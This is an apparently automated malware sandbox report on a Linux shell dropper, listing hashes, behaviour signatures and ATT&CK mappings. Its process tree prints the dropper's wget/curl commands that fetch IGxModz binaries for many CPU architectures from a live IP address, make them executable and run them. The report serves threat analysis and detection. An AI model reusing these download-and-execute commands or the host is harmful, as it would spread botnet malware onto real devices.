f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1

Analysis

max time kernel
28s
max time network
29s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
21/11/2024, 08:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Size

1KB
MD5

0b5a60057fc9d9ce95ba5cdaab501e68
SHA1

879040e7114865f81dbd3f2fb41409e0cb3b8966
SHA256

f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
SHA512

d97b13f656458456b934ab1cdc205ec4efedebfa8ee98675ba38865e916563487d1fd5c649afad7376f469a60ecd16b7c502c549ac095d8be234f6d9e876f351

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
819	chmod
742	chmod
755	chmod
764	chmod
799	chmod
845	chmod
750	chmod
783	chmod
825	chmod
830	chmod

Executes dropped EXE 10 IoCs

ioc	pid	Process
/tmp/3AvA	744	3AvA
/tmp/3AvA	751	3AvA
/tmp/3AvA	756	3AvA
/tmp/3AvA	765	3AvA
/tmp/3AvA	784	3AvA
/tmp/3AvA	800	3AvA
/tmp/3AvA	820	3AvA
/tmp/3AvA	826	3AvA
/tmp/3AvA	831	3AvA
/tmp/3AvA	847	3AvA

Reads runtime system information 10 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
749	cat
751	3AvA
745	wget
747	curl

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/3AvA	f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
File opened for modification	/tmp/IGxModz.arm4	curl
File opened for modification	/tmp/IGxModz.arm7	curl
File opened for modification	/tmp/IGxModz.ppc	curl
File opened for modification	/tmp/IGxModz.sh4	curl
File opened for modification	/tmp/IGxModz.x86	curl
File opened for modification	/tmp/IGxModz.mips	curl
File opened for modification	/tmp/IGxModz.mpsl	curl
File opened for modification	/tmp/IGxModz.arm5	curl
File opened for modification	/tmp/IGxModz.arm6	curl
File opened for modification	/tmp/IGxModz.m68k	curl

/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
1⤵
- Writes file to tmp directory
PID:715
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.x86
  2⤵
  PID:719
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:729
- /bin/cat
  cat IGxModz.x86
  2⤵
  PID:740
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u
  2⤵
  - File and Directory Permissions Modification
  PID:742
- /tmp/3AvA
  ./3AvA x86
  2⤵
  - Executes dropped EXE
  PID:744
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.mips
  2⤵
  - System Network Configuration Discovery
  PID:745
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:747
- /bin/cat
  cat IGxModz.mips
  2⤵
  - System Network Configuration Discovery
  PID:749
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/3AvA
  ./3AvA mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:751
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.mpsl
  2⤵
  PID:752
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:753
- /bin/cat
  cat IGxModz.mpsl
  2⤵
  PID:754
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u
  2⤵
  - File and Directory Permissions Modification
  PID:755
- /tmp/3AvA
  ./3AvA mpsl
  2⤵
  - Executes dropped EXE
  PID:756
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm4
  2⤵
  PID:757
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:758
- /bin/cat
  cat IGxModz.arm4
  2⤵
  PID:763
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u
  2⤵
  - File and Directory Permissions Modification
  PID:764
- /tmp/3AvA
  ./3AvA arm4
  2⤵
  - Executes dropped EXE
  PID:765
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm5
  2⤵
  PID:768
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:773
- /bin/cat
  cat IGxModz.arm5
  2⤵
  PID:781
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u
  2⤵
  - File and Directory Permissions Modification
  PID:783
- /tmp/3AvA
  ./3AvA arm5
  2⤵
  - Executes dropped EXE
  PID:784
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm6
  2⤵
  PID:785
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:790
- /bin/cat
  cat IGxModz.arm6
  2⤵
  PID:797
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u
  2⤵
  - File and Directory Permissions Modification
  PID:799
- /tmp/3AvA
  ./3AvA arm6
  2⤵
  - Executes dropped EXE
  PID:800
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.arm7
  2⤵
  PID:802
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:809
- /bin/cat
  cat IGxModz.arm7
  2⤵
  PID:818
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u
  2⤵
  - File and Directory Permissions Modification
  PID:819
- /tmp/3AvA
  ./3AvA arm7
  2⤵
  - Executes dropped EXE
  PID:820
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.ppc
  2⤵
  PID:821
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:823
- /bin/cat
  cat IGxModz.ppc
  2⤵
  PID:824
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u
  2⤵
  - File and Directory Permissions Modification
  PID:825
- /tmp/3AvA
  ./3AvA ppc
  2⤵
  - Executes dropped EXE
  PID:826
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.m68k
  2⤵
  PID:827
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:828
- /bin/cat
  cat IGxModz.m68k
  2⤵
  PID:829
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u
  2⤵
  - File and Directory Permissions Modification
  PID:830
- /tmp/3AvA
  ./3AvA m68k
  2⤵
  - Executes dropped EXE
  PID:831
- /usr/bin/wget
  wget http://154.213.189.14/bns/IGxModz.sh4
  2⤵
  PID:832
- /usr/bin/curl
  curl -O http://154.213.189.14/bns/IGxModz.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:836
- /bin/cat
  cat IGxModz.sh4
  2⤵
  PID:844
- /bin/chmod
  chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u
  2⤵
  - File and Directory Permissions Modification
  PID:845
- /tmp/3AvA
  ./3AvA sh4
  2⤵
  - Executes dropped EXE
  PID:847

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/IGxModz.x86

Filesize
276B

MD5
960b4fa9d5383373f0a1ea04929df01b

SHA1
f78054d817db7742162a706b5d9f1fedcdf21140

SHA256
3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a

SHA512
2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f

Download Submit